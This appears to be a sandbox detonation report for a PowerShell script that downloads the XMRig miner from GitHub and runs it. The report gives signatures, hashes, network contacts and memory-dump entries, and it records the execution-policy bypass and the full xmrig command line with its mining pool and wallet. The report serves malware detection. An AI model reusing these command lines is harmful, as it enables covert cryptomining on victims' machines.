memory/2468-97-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-98-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-99-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-100-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-101-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-102-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-103-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-104-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-105-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-106-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-107-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-108-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-109-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-110-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-111-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-112-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-113-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-114-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-115-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-116-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-117-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-118-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:52

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/1932-0-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fk42c0v.lqg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1932-9-0x000001BBE9780000-0x000001BBE97A2000-memory.dmp

memory/1932-10-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-11-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-12-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-14-0x000001BBE9820000-0x000001BBE9832000-memory.dmp

memory/1932-15-0x000001BBE9810000-0x000001BBE981A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1904-46-0x0000022F20830000-0x0000022F20850000-memory.dmp

memory/1904-47-0x0000022F22220000-0x0000022F22240000-memory.dmp

memory/1904-48-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-49-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-52-0x0000022FB4E00000-0x0000022FB4E20000-memory.dmp

memory/1932-50-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1904-51-0x0000022FB4BD0000-0x0000022FB4BF0000-memory.dmp

memory/1932-53-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

memory/1904-54-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-55-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-56-0x0000022FB4BD0000-0x0000022FB4BF0000-memory.dmp

memory/1904-57-0x0000022FB4E00000-0x0000022FB4E20000-memory.dmp

memory/1904-58-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-59-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-60-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-61-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-62-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-63-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-64-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-65-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-66-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-67-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-68-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-69-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-70-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-71-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-72-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-73-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-74-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-75-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-76-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-77-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-78-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-79-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-80-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-81-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-82-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-83-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-84-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-85-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-86-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-87-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-88-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-89-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-90-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-91-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-92-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-93-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-94-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-95-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-96-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-97-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-98-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-99-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-100-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-101-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-102-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-103-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-104-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-105-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-106-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-107-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-108-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-109-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-110-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-111-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-112-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-113-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-114-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-115-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-116-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp

Files

memory/3856-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tkbi35ku.lzv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3856-9-0x00000149FC0B0000-0x00000149FC0D2000-memory.dmp

memory/3856-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-14-0x00000149FC5C0000-0x00000149FC5D2000-memory.dmp

memory/3856-15-0x00000149FC4A0000-0x00000149FC4AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1812-46-0x000001980C490000-0x000001980C4B0000-memory.dmp

memory/1812-47-0x000001980DE70000-0x000001980DE90000-memory.dmp

memory/1812-48-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/3856-50-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/1812-49-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-53-0x000001980DEB0000-0x000001980DED0000-memory.dmp

memory/1812-52-0x000001980DE90000-0x000001980DEB0000-memory.dmp

memory/3856-51-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1812-54-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-55-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-57-0x000001980DEB0000-0x000001980DED0000-memory.dmp

memory/1812-56-0x000001980DE90000-0x000001980DEB0000-memory.dmp

memory/1812-58-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-59-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-60-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-61-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-62-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-63-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-64-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-65-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-66-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-67-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-68-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-69-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-70-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-71-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-72-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-73-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-74-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-75-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-76-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-77-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-78-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-79-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-80-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-81-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-82-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-83-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-84-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-85-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-86-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-87-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-88-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-89-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-90-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-91-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-92-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-93-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-94-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-95-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-96-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-97-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-98-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-99-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-100-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-101-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-102-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-103-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-104-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-105-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-106-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-107-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-108-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-109-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-110-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-111-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-112-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-113-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-114-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-115-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-116-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:32

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/4296-0-0x00007FFE444A3000-0x00007FFE444A5000-memory.dmp

memory/4296-1-0x000001C0B0350000-0x000001C0B0372000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1op1n3s.n2b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

